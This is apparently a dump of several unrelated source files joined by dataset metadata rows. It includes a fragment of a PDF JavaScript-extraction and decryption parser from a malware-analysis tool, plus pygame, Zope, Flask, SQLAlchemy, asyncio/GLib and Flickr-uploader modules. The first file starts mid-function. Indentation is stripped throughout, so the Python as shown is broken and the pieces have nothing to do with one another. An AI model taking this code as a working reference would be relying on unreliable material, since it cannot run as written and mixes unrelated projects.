dHash = stepE.encrypt(dHash)
if dHash == encrypt_object['U'][0:16]:
return True
else:
print "No good", encrypt_object['R']
return False
def parse_object_stream(self, data, n, first):
integer_pairs = re.findall('(\d+) +(\d+)', data[0:first])
for i, pairs in enumerate(integer_pairs):
key = str(pairs[0]) + " 0"
start_offset = first + int(pairs[1])
if i+1 == n:
end_offset = None
else:
end_offset = first + int(integer_pairs[i+1][1])
obj_data = data[start_offset:end_offset]
if not key in self.list_obj:
self.list_obj.append(key)
else:
key = key + ' dup'
self.list_obj.append(key)
self.objects[key] = pdfobj(key, obj_data)
self.objects[key].isFromObjStream = True
return
def extractTrailerData(self, trailer_start):
dictionaries = 0
trailer_end = trailer_start
first_dictionary = False
while dictionaries != 0 or not first_dictionary:
d = self.indata[trailer_end:trailer_end+2]
if d == '<<':
first_dictionary = True
dictionaries += 1
trailer_end += 2
continue
elif d == '>>':
dictionaries -= 1
trailer_end += 2
continue
elif d == '':
break
trailer_end += 1
trailer = self.indata[trailer_start:trailer_end]
return trailer
def decryptRC4(self, data, key):
'''
Input: data is the data to decrypt, key is the obj information of the form '5 0'
Assumptions: self.encrypt_key is set
Output: returns string of decrypted data
'''
try:
obj, rev = key.split(' ')
keyLength = self.encrypt_object['KeyLength'] + 5
if keyLength > 16:
keyLength = 16
decrypt_key = hashlib.md5(self.encrypt_key + struct.pack('L', int(obj))[0:3] + struct.pack('L', int(rev))[0:2]).digest()[0:keyLength]
cipher = ARC4.new(decrypt_key)
return cipher.decrypt(data)
except:
return ''
def decryptAES(self, aes_data, objectKey):
'''Function that will take AES encrypted data and decrypt it'''
if self.encrypt_object['V'] <= 4:
try:
obj, rev = objectKey.split(' ')
keyLength = self.encrypt_object['KeyLength'] + 5
if keyLength > 16:
keyLength = 16
m = hashlib.md5()
m.update(self.encrypt_key)
m.update(struct.pack('L', int(obj))[0:3])
m.update(struct.pack('L', int(rev))[0:2])
m.update('\x73\x41\x6c\x54')
aes_key = m.digest()[0:keyLength]
iv = aes_data[0:16]
aes = AES.new(aes_key, AES.MODE_CBC, iv)
pad_size = 16 - (len(aes_data)%16)
pad = "C" * pad_size
data = aes.decrypt(aes_data[16:] + pad)[0:(pad_size*-1)]
return data
except Exception:
return ''
else:
try:
iv = aes_data[0:16]
aes = AES.new(self.encrypt_key, AES.MODE_CBC, iv)
pad_size = 16 - (len(aes_data)%16)
pad = "C" * pad_size
data = aes.decrypt(aes_data[16:] + pad)[0:(pad_size*-1)]
return data
except Exception:
return ''
def is_valid(self):
'''Determines if this is a valid PDF file or not'''
if 0 <= self.indata[0:1024].find('%PDF-') <= 1024:
return True
return False
def __repr__(self):
if not self.is_valid():
return 'Invalid PDF file "%s"' % (self.infile)
out = 'PDF file %s has %d obj items\n' % (self.infile, len(self.objects))
for obj in sorted(self.objects.keys()):
out += str(self.objects[obj]) + '\n'
return out
def get_javascript(self):
'''Extracts all JavaScript from the PDF'''
out = ''
sloppy_flag = False
for jskey in self.jsObjects:
if self.objects[jskey].tagstreamError:
continue
if self.objects[jskey].staticScript:
out += self.objects[jskey].staticScript
if self.objects[jskey].tagstream:
value = self.objects[jskey].tagstream
value = re.sub('\'', '\\x27', value)
# Sometimes there is just weird data there (or unicode), maybe getting rid of it helps
# (like below)
value = re.sub('[\x00-\x1f\x7f-\xff]', '', value)
if self.objects[jskey].isAnnot:
out += 'var zzza = []; if(zzzannot.length > 0){ zzza=zzzannot.pop(); } zzza.push({subject:\'%s\'}); zzzannot.push(zzza);\n' % (value) #getAnnots
if self.objects[jskey].knownName:
if self.objects[jskey].subj:
subj = self.objects[jskey].subj
else:
subj = value
subj = re.sub('[\x00-\x1f\x7f-\xff]', '', subj) # <- below
out += 'zzzannot2["%s"] = {subject:\'%s\'};\n' % (self.objects[jskey].knownName, subj) #getAnnot
for doc_prop in self.objects[jskey].doc_properties:
out += 'info.%s = String(\'%s\'); this.%s = info.%s;\n' % (doc_prop, olivia.do_hexAscii(value), doc_prop, doc_prop)
if self.pages:
for page in self.pages:
if page in self.objects:
lines = self.objects[page].tagstream.split('\n')
out += 'c = []; '
for line in lines:
text_be = re.findall('BT[^(]*\(([^)]+)\)[^)]*?ET', line)
for hexdata in text_be:
words = hexdata.strip().split(' ')
for word in words:
out += 'c.push("%s"); ' % (olivia.do_hexAscii(word))
out += 'zzzpages.push(c); this.numPages = zzzpages.length; xfa.host.numPages = zzzpages.length;\n'
else:
out += 'this.numPages = ' + str(self.numPages) + ';\n'
out += 'xfa.host.numPages = ' + str(self.numPages) + ';\n'
else:
out += 'c = []; '
out += 'zzzpages.push(c); this.numPages = zzzpages.length; xfa.host.numPages = zzzpages.length;\n'
out += '\nfilesize = ' + str(self.size) + ';\n'
if out:
out += '\n//jsunpack End PDF headers\n'
headersjs = out #split value into 2 return values [js, header_js]
out = ''
delayout = ''
for jskey in self.jsObjects:
if self.objects[jskey].tagstreamError:
continue
# only do it if no encryption or it was decrypted
if self.encrypt_key == '' or self.encrypt_key_valid == True:
if self.objects[jskey].isDelayJS: #do this first incase the tag has /OpenAction /JS (funct())
if olivia.DEBUG:
print 'Found JavaScript (delayed) in %s (%d bytes)' % (jskey, len(self.objects[jskey].tagstream))
delayout += self.objects[jskey].tagstream
elif self.objects[jskey].isJS:
if olivia.DEBUG:
print 'Found JavaScript in %s (%d bytes)' % (jskey, len(self.objects[jskey].tagstream))
#if jskey == '84 0':
# print self.objects[jskey].tagstream
if len(self.objects[jskey].tagstream) > 4 and self.objects[jskey].tagstream[3] != '\x00':
out += self.objects[jskey].tagstream
if out[-1] not in[';', '}']:
out += ';'
else:
temp_js = re.sub(r'([^\x00])\x0a', r'\1', self.objects[jskey].tagstream)
temp_js = re.sub(r'([^\x00])\x0d', r'\1', temp_js)
temp_js = re.sub('^([\x80-\xff])', '', temp_js)
temp_js = re.sub('([\x00-\x08\x0b\x0c\x0e-\x1f])', '', temp_js)
temp_js = re.sub('([\x80-\xff])', 'C', temp_js)
out += temp_js
if olivia.DEBUG:
if self.objects[jskey].isJS or self.objects[jskey].isDelayJS:
print '\tchildren ' + str(self.objects[jskey].children)
print '\ttags ' + str(self.objects[jskey].tags)
print '\tindata = ' + re.sub('[\n\x00-\x19\x7f-\xff]', '', self.objects[jskey].indata)[:100]
for key in self.list_obj:
if self.objects[key].is_xfa and (self.encrypt_key == '' or self.encrypt_key_valid):
xfa_data = ''
for xfa_type, xfa_key in self.objects[key].xfaChildren:
if xfa_key in self.list_obj:
xfa_data += self.objects[xfa_key].tagstream
# gets rid of some crap. But unicode will probably cause problems down the road
xfa_data = re.sub('^([\x80-\xff])', '', xfa_data)
xfa_data = re.sub('([\x00-\x08\x0b\x0c\x0e-\x1f])', '', xfa_data)
xfa_data = re.sub('([\x80-\xff])', 'C', xfa_data)
try:
doc = xml.dom.minidom.parseString(xfa_data)
except Exception as e:
print "drat", str(e)
continue
scriptElements = doc.getElementsByTagNameNS("*", "script")
if not scriptElements:
continue
for script in scriptElements:
if script.getAttribute('contentType') != 'application/x-javascript' or not script.childNodes:
continue
js = script.childNodes[0].data
# maybe?
if type(js) == unicode:
js = unicode(js).encode('utf-8')
dataForJs = ''
jsNode = script.parentNode.parentNode
jsName = jsNode.getAttribute('name')
if type(jsName) == unicode:
jsName = unicode(jsName).encode('utf-8')
dataElements = doc.getElementsByTagName(jsName)
if dataElements and dataElements[0].childNodes and dataElements[0].childNodes[0].nodeType == xml.dom.minidom.Node.TEXT_NODE:
dataForJs = dataElements[0].childNodes[0].data.replace('\n', '').replace('\r', '')
xfa_javascript = ''
if jsName:
xfa_javascript += jsName + "=this;\n"
xfa_javascript += 'var rawValue = "' + dataForJs.strip() + '";\n'
for k in jsNode.attributes.keys():
xfa_javascript += jsName + '.' + k + ' = "' + jsNode.getAttribute(k) + '";\n'
xfa_javascript += js + '\n'
if jsName:
xfa_javascript += 'print("<rawValue>" + ' + jsName + '.rawValue + "</rawValue>");\n'
out += xfa_javascript
if len(out + delayout) <= 0:
#Basically if we don't find ANY JavaScript, then we can parse the other elements
for jskey in self.objects.keys():
sloppy = re.search('function |var ', self.objects[jskey].tagstream)
if sloppy:
sloppy_flag = True
out += self.objects[jskey].tagstream
if olivia.DEBUG:
print 'Sloppy PDF parsing found %d bytes of JavaScript' % (len(out))
return re.sub('[\x00-\x08\x0b\x0c\x0e-\x1f\x80-\xff]', '', out + delayout), headersjs, sloppy_flag
@staticmethod
def do_hexAscii(input):
return re.sub('([^a-zA-Z0-9])', lambda m: '\\x%02x' % ord(m.group(1)), input)
@staticmethod
def applyFilter(data):
if len(data) > 10000000:
return data
for i in range(0, len(data)):
c = ord(data[i])
if 0 < c < 0x19 or 0x7f < c < 0xff or data[i] in ' \n\r':
pass #cut beginning non-ascii characters
else:
data = data[i:]
break
data = data[::-1] #reversed
for i in range(0, len(data)):
c = ord(data[i])
if 0 < c < 0x19 or 0x7f < c < 0xff or data[i] in ' \n\r':
pass #cut trailing non-ascii characters
else:
data = data[i:]
break
output = data[::-1]
#output = re.sub('^[\x00-\x19\x7f-\xff\n\s]*[\x00-\x19\x7f-\xff]','',input) #look for starting non-ascii characters
#output = re.sub('[\x00-\x19\x7f-\xff\s]+$','',output) #look for trailing non-ascii characters
return output
| gpl-2.0 | -9,150,533,911,025,023,000 | 45.813061 | 175 | 0.458253 | false | 4.278914 | false | false | false |
ShadowApex/pygame-sdl2 | pygame2/transform/__init__.py | 1 | 2142 | #!/usr/bin/python
import sdl2
import sdl2.sdlgfx
from sdl2 import surface
import pygame2
def scale(surface, size, dest_sprite=None, resample=0):
"""Scale an image using python's imaging library."""
if not pygame2.display.window:
raise Exception("Error: Window has not yet been created.")
sprite = surface.sprite
# Resize the image using PIL
try:
img = sprite.pil.resize(size, resample)
except AttributeError:
print "ERROR: This surface does not have a PIL object! Resizing image failed."
return surface
# Create an SDL2 surface from our sprite.
surface, pil_surface = pygame2.image.load_image(img)
# Create a new sprite from the surface.
scaled_sprite = pygame2.display.window.factory.from_surface(surface)
scaled_sprite.angle = sprite.angle
scaled_sprite.pil = pil_surface
# If we're using a software renderer, keep an original for rotation.
if pygame2.display.window.type == "software":
scaled_sprite.original = pygame2.display.window.factory.from_surface(surface, True)
else:
scaled_sprite.sw_sprite = pygame2.display.window.sw_factory.from_surface(surface, True)
image = pygame2.Surface(sprite=scaled_sprite)
return image
def copy(surface):
if not pygame2.display.window:
raise Exception("Error: Window has not yet been created.")
sprite = surface.sprite
# Resize the image using PIL
img = sprite.pil
# Create an SDL2 surface from our sprite.
surface, pil_surface = pygame2.image.load_image(img)
# Create a new sprite from the surface.
new_sprite = pygame2.display.window.factory.from_surface(surface)
new_sprite.angle = sprite.angle
new_sprite.pil = pil_surface
# If we're using a software renderer, keep an original for rotation.
if pygame2.display.window.type == "software":
new_sprite.original = pygame2.display.window.factory.from_surface(surface, True)
else:
new_sprite.sw_sprite = pygame2.display.window.sw_factory.from_surface(surface, True)
image = pygame2.Surface(sprite=new_sprite)
return image
| gpl-2.0 | -6,444,661,151,184,808,000 | 28.75 | 95 | 0.697012 | false | 3.79115 | false | false | false |
ZeitOnline/zeit.today | src/zeit/today/interfaces.py | 1 | 1088 |
import zope.interface
import zope.schema
from zeit.cms.i18n import MessageFactory as _
class ICountStorage(zope.interface.Interface):
"""Central access to click counting.
This utility takes care of refreshing and caching today.xml.
"""
def get_count(unique_id):
"""Return access count for given unique id.
returns amount of hits (int) or None if nothing is known about the
given unique_id.
"""
def get_count_date(unique_id):
"""Return the date when the sample was taken."""
def __iter__():
"""Iterate over the stored unique_ids."""
LIFETIME_DAV_NAMESPACE = 'http://namespaces.zeit.de/CMS/lifetimecounter'
class ILifeTimeCounter(zope.interface.Interface):
"""Live time hit counter."""
total_hits = zope.schema.Int(
title=_('Total hits'),
description=_('Total hits between first and last count.'))
first_count = zope.schema.Date(
title=_('Date the first hit was counted on'))
last_count = zope.schema.Date(
title=_('Date the last hit was counted on'))
| bsd-3-clause | -7,988,097,960,612,468,000 | 23.727273 | 74 | 0.651654 | false | 4.04461 | false | false | false |
MingdaMingda/TO050001-TinySuggestion | server/bin/tiny_sugg.py | 1 | 3843 | #coding=utf-8
"""
@Brief build index of suggestion
@Author wmd
@Create 2015.11.05
"""
import sugg_conf
import sys
from pypinyin import lazy_pinyin
class SuggServer:
_h_tid2item = {}
_h_key2item = {}
_h_prefix2tids = {}
def is_chinese_char(uchar):
'''
check if chinese character
'''
if uchar >= u'u4e00' and uchar<=u'u9fa5':
return True
else:
return False
def load_item_set(self):
'''
load item-set
'''
ifilename = sugg_conf.FileOutputItemSet
sys.stderr.write('[trace] begin to build item-set from:%s\n' % (ifilename))
try:
ifile = open(ifilename, 'r')
except:
sys.stderr.write('[ERROR] cannot open file:%s\n' % ifilename)
sys.exit(-1)
line_no = 0
for line in ifile:
line_no += 1
fields = line.replace('\n', '').split('\t')
if len(fields) != 4:
sys.stderr.write('[ERROR] invalid fields-count:%d, not %d\n' % (len(fields), 4))
sys.exit(-1)
tid = int(fields[0])
text = fields[1]
score = int(fields[2])
att = fields[3]
item = {
'tid' : tid,
'text' : text,
'score' : score,
'att' : att,
}
key = '%s\t%s' % (text, att)
self._h_tid2item[tid] = item
self._h_key2item[key] = item
ifile.close()
sys.stderr.write('[trace] done:%s, %d lines\n' % (ifilename, line_no))
def load_prefix_index(self):
'''
load prefix-index-dict
'''
ifilename = '%s.prefix' % sugg_conf.FileOutput
sys.stderr.write('[trace] begin to load prefix-index from:%s\n' % (ifilename))
try:
ifile = open(ifilename, 'r')
except:
sys.stderr.write('[ERROR] cannot open file:%s\n' % ifilename)
sys.exit(-1)
line_no = 0
for line in ifile:
line_no += 1
fields = line.replace('\n', '').split('\t')
if len(fields) < 2:
sys.stderr.write('[ERROR] invalid fields-count:%d, < %d\n' % (len(fields), 2))
sys.exit(-1)
prefix = fields[0]
tids = []
for i in range(1, len(fields)):
tids.append(int(fields[i]))
self._h_prefix2tids[prefix] = tids
ifile.close()
sys.stderr.write('[trace] done:%s, %d lines\n' % (ifilename, line_no))
def load_index(self):
'''
load index-dicts
'''
self.load_item_set()
self.load_prefix_index()
def get_sugg(self, prefix):
'''
get suggestion-list according to a certain prefix
'''
sugg_info = {}
sugg_info['prefix'] = prefix
sugg_info['sugg'] = []
if len(prefix) == 0:
return sugg_info
py_flag = False
if not prefix in self._h_prefix2tids:
if sugg_conf.ifPY == 1:
py = lazy_pinyin(prefix.decode(sugg_conf.encoding))
py_str = (''.join(py)).encode(sugg_conf.encoding)
if not py_str in self._h_prefix2tids:
return sugg_info
### as an alternate, use py_str as prefix
prefix = py_str
py_flag = True
else:
return sugg_info
tids = self._h_prefix2tids[prefix]
for tid in tids:
if not tid in self._h_tid2item:
continue
item = self._h_tid2item[tid]
sugg_item = {
'text' : item['text'],
'score' : item['score'],
'att' : item['att'],
}
sugg_info['sugg'].append(sugg_item)
return sugg_info
def init(self):
'''
init
'''
sys.stderr.write('[trace] init\n')
self.load_index()
def run(self):
'''
dispatch commands
'''
if len(sys.argv) < 2:
sys.stderr.write('[ERROR] no command\n')
sys.exit(-1)
sys.stderr.write('[trace] begin to run command: %s\n' % sys.argv[1])
if sys.argv[1] == 'build_item_set':
self.build_item_set()
elif sys.argv[1] == 'gen_tag2tid':
self.load_item_set()
self.gen_tag2tid()
elif sys.argv[1] == 'gen_prefix2tid':
self.gen_prefix2tid()
else:
sys.stderr.write('[ERROR] unknown command: %s\n' % sys.argv[1])
sys.exit(-1)
sys.stderr.write('[trace] done.\n')
if __name__ == '__main__':
server = SuggServer()
server.init()
server.run()
| mit | -174,198,553,257,588,670 | 19.550802 | 84 | 0.590684 | false | 2.54672 | false | false | false |
mdg/pygrate | pygration/db.py | 1 | 2877 | import sqlalchemy
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import mapper, sessionmaker
import subprocess
class PygrationState(object):
'''Python object representing the state table'''
def __init__(self, migration=None, step_id=None, step_name=None):
self.migration = migration
self.step_id = step_id
self.step_name = step_name
self.sequence = None
self.add_state = None
self.simdrop_state = None
self.drop_state = None
def __repr__(self):
return "<PygrationState(%s, %s)>" % (self.migration, self.step_id)
class Table(object):
metadata = sqlalchemy.MetaData()
engine = None
pygration_state = None
@classmethod
def define(cls, schema=None):
cls.pygration_state = sqlalchemy.Table('pygration_state', cls.metadata
, Column('migration', String(length=160), primary_key=True)
, Column('step_id', String(length=160), primary_key=True)
, Column('step_name', String(length=160))
, Column('sequence', Integer)
, Column('add_state', String(length=16))
, Column('simdrop_state', String(length=16))
, Column('drop_state', String(length=16))
, schema=schema
)
class FileLoader(object):
'''Object for running SQL from a file on the file system'''
def __init__(self, binary, args = [], formatting_dict = {}):
self._binary = binary
self._args = [arg.format(filename="{filename}", **formatting_dict) for arg in args]
def __call__(self, filename):
args = [arg.format(filename=filename) for arg in self._args]
print self._binary, args
subprocess.check_call([self._binary] + args)
def open(url=None, drivername=None, schema=None, username=None,
password=None, host=None, port=None, database=None, query=None):
"""Open the DB through a SQLAlchemy engine.
Returns an open session.
"""
if url is None and drivername is None:
raise Exception("Either a url or a driver name is required to open a db connection")
if url is None:
url = sqlalchemy.engine.url.URL(drivername = drivername,
username = username,
password = password,
host = host,
port = port,
database = database,
query = query)
Table.engine = sqlalchemy.create_engine(url)
Table.metadata.bind = Table.engine
Session = sessionmaker()
Session.configure(bind=Table.engine)
session = Session()
Table.define(schema)
mapper(PygrationState, Table.pygration_state)
return session
| apache-2.0 | 1,958,043,424,474,704,400 | 34.518519 | 92 | 0.57838 | false | 4.37234 | false | false | false |
balachia/pandoc-filters | pandoc-postprocess.py | 1 | 3430 | # post-process tex files, looking for
# "%% @..." directives
import sys
import codecs
import re
debug = 0
verbose=True
# define processors
class PostProcessor:
def process_line(self, line):
return (line, False)
class ReplaceNextEnvironment(PostProcessor):
def __init__(self, args):
self.opened1 = False
self.openenv = 0
self.target = args[0]
self.replacement = args[1]
self.targeto = re.compile(r'\\begin{' + args[0] + '}', re.U)
self.targetc = re.compile(r'\\end{' + args[0] + '}', re.U)
def process_line(self, line):
reso = self.targeto.match(line)
resc = self.targetc.match(line)
#print("RNE :: " + line + str(reso) + str(resc) +
#str(self.targeto.pattern))
res = (line, False)
if reso:
if not self.opened1:
self.opened1 = True
line = self.targeto.sub(r'\\begin{' + self.replacement +
'}',line)
res = (line, False)
self.openenv += 1
if resc:
if self.opened1:
self.openenv -= 1
if self.openenv == 0:
line = self.targetc.sub(r'\\end{' + self.replacement +
'}',line)
res = (line, True)
return res
# set up processor dict
processor_dict = dict()
processor_dict['replace-next-environment'] = ReplaceNextEnvironment
ppdirective_re = re.compile(r'^%% @(\S+) (.*)')
def main():
# announce
if verbose:
print('Python Pandoc Postprocessor')
# read args
args = sys.argv
if len(args) == 1:
raise SystemExit('No arguments supplied')
else:
infile = args[1]
# announce
if verbose:
print('\tProcessing: %s' % infile)
# read in file, lazy as hell
with codecs.open(infile, mode='r', encoding='utf8') as fin:
lines = [line.strip() for line in fin]
if debug > 0:
print(lines)
processors = list()
outlines = list()
for line in lines:
res = ppdirective_re.match(line)
if debug > 0:
print(line)
# check for new processors
if res:
directive = res.groups()[0]
dir_args = [x.strip() for x in (res.groups()[1]).split()]
processors.append(processor_dict[directive](dir_args))
if debug > 0:
print('\tDIRECTIVE: %s, ARGS: %s' % (directive, dir_args))
continue
elif debug > 1:
print('\t(NO DIRECTIVE)')
# run the processors
drop_processor = list()
for processor in processors:
res = processor.process_line(line)
line = res[0]
drop_processor.append(res[1])
if debug > 1:
print(" ==> " + str(line))
outlines.append(line)
if debug > 1:
print(processors)
# drop any finished processors
processors = [processors[i] for i in range(len(processors)) if not
drop_processor[i]]
if debug > 1:
print(processors)
# write everything out
if debug > 0:
print(outlines)
with codecs.open(infile, mode='w', encoding='utf8') as fout:
for line in outlines:
fout.write(line + "\n")
if verbose:
print('\tPPP done!')
if __name__ == "__main__":
main()
| gpl-3.0 | -8,395,575,494,031,921,000 | 24.597015 | 74 | 0.523615 | false | 3.832402 | false | false | false |
jdber1/opendrop | opendrop/vendor/aioglib/_policy.py | 2 | 1951 | import asyncio
from gi.repository import GLib
import threading
from typing import MutableMapping
import sys
import weakref
from ._loop import GLibEventLoop
__all__ = [
'GLibEventLoopPolicy',
]
class GLibEventLoopPolicy(asyncio.AbstractEventLoopPolicy):
class _ThreadLocalVariable(threading.local):
value = None
def __init__(self) -> None:
self._set_loops_lock = threading.Lock()
self._set_loops = weakref.WeakValueDictionary() # type: MutableMapping[GLib.MainContext, GLibEventLoop]
self._last_accessed_loop = __class__._ThreadLocalVariable()
def get_event_loop(self) -> GLibEventLoop:
context = self._get_current_context()
with self._set_loops_lock:
try:
loop = self._set_loops[context]
except KeyError:
loop = GLibEventLoop(context)
self._set_loops[context] = loop
self._last_accessed_loop.value = loop
return loop
def set_event_loop(self, loop: GLibEventLoop) -> None:
context = self._get_current_context()
if loop.context != context:
raise ValueError("Loop has a different context")
with self._set_loops_lock:
self._set_loops[context] = loop
self._last_accessed_loop.value = loop
def new_event_loop(self) -> GLibEventLoop:
context = self._get_current_context()
return GLibEventLoop(context)
def _get_current_context(self) -> GLib.MainContext:
default_context = GLib.MainContext.get_thread_default()
if default_context is None:
default_context = GLib.MainContext.default()
return default_context
if sys.platform != 'win32':
def get_child_watcher(self) -> asyncio.AbstractChildWatcher:
raise NotImplementedError
def set_child_watcher(self, watcher: asyncio.AbstractChildWatcher) -> None:
raise NotImplementedError
| gpl-3.0 | -1,136,327,726,012,550,800 | 29.015385 | 112 | 0.643772 | false | 4.064583 | false | false | false |
lepture/june | june/views/topic.py | 1 | 6490 | # coding: utf-8
from flask import Blueprint, g, request, flash
from flask import render_template, redirect, abort, jsonify
from flask import url_for
from flask.ext.babel import gettext as _
from ..helpers import require_user, force_int, limit_request
from ..models import Node, Topic, Reply, Account
from ..models import fill_topics, fill_with_users
from ..forms import TopicForm, ReplyForm
__all__ = ['bp']
bp = Blueprint('topic', __name__)
@bp.route('/')
def topics():
"""
The topics list page.
"""
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
paginator = Topic.query.order_by(Topic.updated.desc()).paginate(page)
paginator.items = fill_topics(paginator.items)
return render_template('topic/topics.html', paginator=paginator,
endpoint='topic.topics')
@bp.route('/latest')
def latest():
"""
Topics ordered by created time.
"""
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
paginator = Topic.query.order_by(Topic.id.desc()).paginate(page)
paginator.items = fill_topics(paginator.items)
return render_template('topic/topics.html', paginator=paginator,
endpoint='topic.latest')
@bp.route('/desert')
def desert():
"""
Topics without any replies.
"""
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
paginator = Topic.query.filter_by(
reply_count=0).order_by(Topic.id.desc()).paginate(page)
paginator.items = fill_topics(paginator.items)
return render_template('topic/topics.html', paginator=paginator,
endpoint='topic.desert')
@bp.route('/create/<urlname>', methods=['GET', 'POST'])
@require_user
def create(urlname):
"""
Create a topic in the node by an activated user.
:param urlname: the urlname of the Node model
"""
node = Node.query.filter_by(urlname=urlname).first_or_404()
if node.role == 'staff' and not g.user.is_staff:
flash(_('You have no permission in this node.'), 'warn')
return redirect(url_for('node.view', urlname=urlname))
if node.role == 'admin' and not g.user.is_admin:
flash(_('You have no permission in this node.'), 'warn')
return redirect(url_for('node.view', urlname=urlname))
form = TopicForm()
if form.validate_on_submit():
topic = form.save(g.user, node)
return redirect(url_for('.view', uid=topic.id))
return render_template('topic/create.html', node=node, form=form)
@bp.route('/<int:uid>', methods=['GET', 'POST'])
def view(uid):
"""
View a topic with the given id.
:param uid: the id of a topic.
"""
if request.method == 'POST':
# record hits
topic = Topic.query.get_or_404(uid)
topic.hits += 1
topic.save()
return jsonify(hits=topic.hits)
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
topic = Topic.query.get_or_404(uid)
node = Node.query.get_or_404(topic.node_id)
author = Account.query.get_or_404(topic.account_id)
paginator = Reply.query.filter_by(topic_id=uid).paginate(page)
paginator.items = fill_with_users(paginator.items)
form = None
if g.user:
form = ReplyForm()
return render_template(
'topic/view.html', topic=topic, node=node, author=author,
form=form, paginator=paginator
)
@bp.route('/<int:uid>/edit', methods=['GET', 'POST'])
@require_user
def edit(uid):
"""
Edit a topic by the topic author.
:param uid: the id of the topic
"""
topic = Topic.query.get_or_404(uid)
form = TopicForm(obj=topic)
if form.validate_on_submit():
form.populate_obj(topic)
topic.save()
return redirect(url_for('.view', uid=uid))
return render_template('topic/edit.html', topic=topic, form=form)
@bp.route('/<int:uid>/delete', methods=['POST'])
@require_user
def delete(uid):
"""
Delete a topic by the topic author.
"""
#TODO: should we delete the replies of the topic?
password = request.form.get('password')
if not password:
flash(_('Password is required to delete a topic'), 'info')
return redirect(url_for('.view', uid=uid))
if not g.user.check_password(password):
flash(_('Password is wrong'), 'error')
return redirect(url_for('.view', uid=uid))
topic = Topic.query.get_or_404(uid)
topic.delete()
return redirect(url_for('.topics'))
@bp.route('/<int:uid>/move', methods=['GET', 'POST'])
@require_user
def move(uid):
"""
Move a topic to another node.
:param uid: the id of the topic
"""
topic = Topic.query.get_or_404(uid)
if g.user.id != topic.account_id and not g.user.is_staff:
return abort(403)
if request.method == 'GET':
return render_template('topic/move.html', topic=topic)
urlname = request.form.get('node', None)
if not urlname:
return redirect(url_for('.view', uid=uid))
node = Node.query.filter_by(urlname=urlname).first()
if node:
topic.move(node)
flash(_('Move topic success.'), 'success')
else:
flash(_('Node not found.'), 'error')
return redirect(url_for('.view', uid=uid))
@bp.route('/<int:uid>/reply', methods=['POST', 'DELETE'])
@limit_request(5, redirect_url=lambda uid: url_for('.view', uid=uid))
@require_user
def reply(uid):
"""
Reply of the given topic.
* POST: it will create a reply
* DELETE: it will delete a reply
Delete should pass an arg of the reply id, and it can be only deleted
by the reply author or the staff members.
:param uid: the id of the topic
"""
if request.method == 'DELETE':
reply_id = force_int(request.args.get('reply', 0), 0)
if not reply_id:
return abort(404)
reply = Reply.query.get_or_404(reply_id)
if not reply:
return abort(404)
if reply.topic_id != uid:
return abort(404)
if g.user.is_staff or g.user.id == reply.account_id:
reply.delete()
return jsonify(status='success')
return abort(403)
topic = Topic.query.get_or_404(uid)
form = ReplyForm()
if form.validate_on_submit():
form.save(g.user, topic)
else:
flash(_('Missing content'), 'error')
return redirect(url_for('.view', uid=uid))
| bsd-3-clause | -4,477,287,090,108,057,000 | 28.634703 | 73 | 0.616949 | false | 3.517615 | false | false | false |
levitte/postrfs | src/util.py | 1 | 4121 | # Postr, a Flickr Uploader
#
# Copyright (C) 2006-2008 Ross Burton <[email protected]>
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin
# St, Fifth Floor, Boston, MA 02110-1301 USA
import os
from gi.repository import Gtk, GdkPixbuf
import bsddb3
from twisted.web.client import getPage
from twisted.internet import defer
from twisted.python import log
def greek(size):
"""Take a quantity (like 1873627) and display it in a human-readable rounded
form (like 1.8M)"""
_abbrevs = [
(1 << 50L, 'P'),
(1 << 40L, 'T'),
(1 << 30L, 'G'),
(1 << 20L, 'M'),
(1 << 10L, 'k'),
(1, '')
]
for factor, suffix in _abbrevs:
if size > factor:
break
return "%.1f%s" % (float(size) / factor, suffix)
def get_widget_checked(glade, name):
"""Get widget name from glade, and if it doesn't exist raise an exception
instead of returning None."""
widget = glade.get_object(name)
if widget is None: raise "Cannot find widget %s" % name
return widget
def get_glade_widgets (glade, object, widget_names):
"""Get the widgets in the list widget_names from the GladeXML object glade
and set them as attributes on object."""
for name in widget_names:
setattr(object, name, get_widget_checked(glade, name))
def get_thumb_size(srcw, srch, dstw, dsth):
"""Scale scrw x srch to an dimensions with the same ratio that fits as
closely as possible to dstw x dsth."""
scalew = dstw / float(srcw)
scaleh = dsth / float(srch)
scale = min(scalew, scaleh)
return (int(srcw * scale), int(srch * scale))
def align_labels(glade, names):
"""Add the list of widgets identified by names in glade to a horizontal
sizegroup."""
group = Gtk.SizeGroup()
group.set_mode(Gtk.SizeGroupMode.HORIZONTAL)
widget = [group.add_widget(get_widget_checked(glade, name)) for name in names]
__buddy_cache = None
def get_buddyicon(flickr, data, size=48):
"""Lookup the buddyicon from the data in @data using @flickr and resize it
to @size pixels."""
global __buddy_cache
if __buddy_cache is None:
folder = os.path.join (get_cache_path(), "postr")
if not os.path.exists(folder):
os.makedirs(folder)
path = os.path.join (folder, "buddyicons")
try:
__buddy_cache = bsddb3.hashopen(path, "c")
except bsddb3.db.DBInvalidArgError:
# The database needs upgrading, so delete it
os.remove(path)
__buddy_cache = bsddb3.hashopen(path, "c")
def load_thumb(page, size):
loader = GdkPixbuf.PixbufLoader()
loader.set_size (size, size)
loader.write(page)
loader.close()
return loader.get_pixbuf()
def got_data(page, url, size):
__buddy_cache[url] = page
return load_thumb(page, size)
if int(data.get("iconfarm")) > 0:
url = "http://farm%s.static.flickr.com/%s/buddyicons/%s.jpg" % (data.get("iconfarm"), data.get("iconserver"), data.get("nsid"))
else:
url = "http://www.flickr.com/images/buddyicon.jpg"
if __buddy_cache.has_key(url):
return defer.execute(load_thumb, __buddy_cache[url], size)
else:
deferred = getPage(url)
deferred.addCallback(got_data, url, size)
deferred.addErrback(log.err)
return deferred
def get_cache_path():
"""Return the location of the XDG cache directory."""
return os.environ.get("XDG_CACHE_HOME", os.path.expanduser("~/.cache/"))
